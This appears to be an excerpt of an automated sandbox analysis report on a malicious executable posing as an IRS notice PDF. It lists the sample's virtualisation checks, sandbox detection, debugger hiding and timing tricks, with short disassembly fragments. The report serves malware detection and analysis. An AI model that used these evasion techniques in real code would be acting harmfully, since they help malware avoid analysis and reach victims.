      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00563605
      Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeRDTSC instruction interceptor: First address: 00000000021D0E11 second address: 00000000021D0E11 instructions:
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeRDTSC instruction interceptor: First address: 00000000021D3B9A second address: 00000000021D3B9A instructions:
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeRDTSC instruction interceptor: First address: 00000000005624EA second address: 00000000005624EA instructions:
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeRDTSC instruction interceptor: First address: 0000000000562620 second address: 0000000000562620 instructions:
      Tries to detect Any.runShow sources
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeFile opened: C:\Program Files\qga\qga.exe
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeFile opened: C:\Program Files\qga\qga.exe
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
      Source: IRS Notice Letter pdf document.exe, 00000000.00000002.693450693.00000000021D0000.00000040.00000001.sdmp, IRS Notice Letter pdf document.exe, 00000001.00000002.751120614.0000000000562000.00000040.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE=
      Source: IRS Notice Letter pdf document.exeBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Tries to detect virtualization through RDTSC time measurementsShow sources
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeRDTSC instruction interceptor: First address: 00000000021D0E11 second address: 00000000021D0E11 instructions:
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeRDTSC instruction interceptor: First address: 00000000021D3B9A second address: 00000000021D3B9A instructions:
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeRDTSC instruction interceptor: First address: 00000000005624EA second address: 00000000005624EA instructions:
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeRDTSC instruction interceptor: First address: 0000000000562620 second address: 0000000000562620 instructions:
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 00000000030C85E4 second address: 00000000030C85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 00000000030C896E second address: 00000000030C8974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D34AF rdtsc
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeWindow / User API: threadDelayed 9369
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeWindow / User API: threadDelayed 631
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeAPI coverage: 3.5 %
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeAPI coverage: 3.7 %
      Source: C:\Windows\SysWOW64\cmstp.exeAPI coverage: 8.5 %
      Source: C:\Windows\explorer.exe TID: 4500Thread sleep time: -75000s >= -30000s
      Source: C:\Windows\SysWOW64\cmstp.exe TID: 1900Thread sleep time: -54000s >= -30000s
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\cmstp.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\cmstp.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: explorer.exe, 00000002.00000000.730568979.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
      Source: explorer.exe, 00000002.00000000.734772024.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: IRS Notice Letter pdf document.exe, 00000000.00000002.693450693.00000000021D0000.00000040.00000001.sdmp, IRS Notice Letter pdf document.exe, 00000001.00000002.751120614.0000000000562000.00000040.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe=
      Source: explorer.exe, 00000002.00000000.731028319.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000002.00000000.734772024.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: IRS Notice Letter pdf document.exe, 00000001.00000002.751435169.0000000000917000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
      Source: explorer.exe, 00000002.00000000.729316309.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
      Source: explorer.exe, 00000002.00000000.734930880.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
      Source: explorer.exe, 00000002.00000000.730568979.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
      Source: IRS Notice Letter pdf document.exeBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: explorer.exe, 00000002.00000000.730568979.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
      Source: explorer.exe, 00000002.00000000.735028043.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
      Source: explorer.exe, 00000002.00000000.730568979.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeProcess information queried: ProcessInformation

      Anti Debugging:

      barindex
      Contains functionality to hide a thread from the debuggerShow sources
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D4BFA NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000040,021D09A4,00000000
      Hides threads from debuggersShow sources
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeProcess queried: DebugPort
      Source: C:\Windows\SysWOW64\cmstp.exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D34AF rdtsc
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D5252 LdrInitializeThunk,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D8211 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D8205 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D825E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D8250 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D8271 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D8296 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D2317 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D8119 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D817D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D8161 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D8198 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D81A9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D81DD mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D81F4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D81E9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D66D1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D741C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D2A43 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D2A62 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D2A99 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D2A88 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D2AAA mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D3F04 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D2D29 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D2D5D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E23E620 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2EFE3F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E23C600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E23C600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E23C600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E268E00 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F1608 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E26A61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E26A61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E24766D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E247E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E247E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E247E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E247E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E247E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E247E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2FAE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2FAE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2B46A7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E300EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E300EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E300EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2CFE87 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2616E0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2476E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E278EC7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E308ED6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2636CC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2EFEC0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E234F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E234F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E26E730 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25B73D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25B73D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E26A70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E26A70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25F716 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2CFF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2CFF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E30070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E30070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E24FF60 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E308F6A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E24EF40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E248794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2B7794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2B7794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2B7794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2737F5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E26BC2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2B6C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2B6C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2B6C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2B6C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E30740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E30740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E30740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25746D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E26AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E26AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E26AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E26AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E26AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E26AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E26AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E26AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E26AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E26AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E26AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E26A44B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2CC450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2CC450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E24849B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F14FB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2B6CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2B6CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2B6CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E308CD6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E308D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E243D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E243D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E243D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E243D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E243D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E243D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E243D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E243D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E243D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E243D34 mov eax, dword ptr fs:[00000030h]
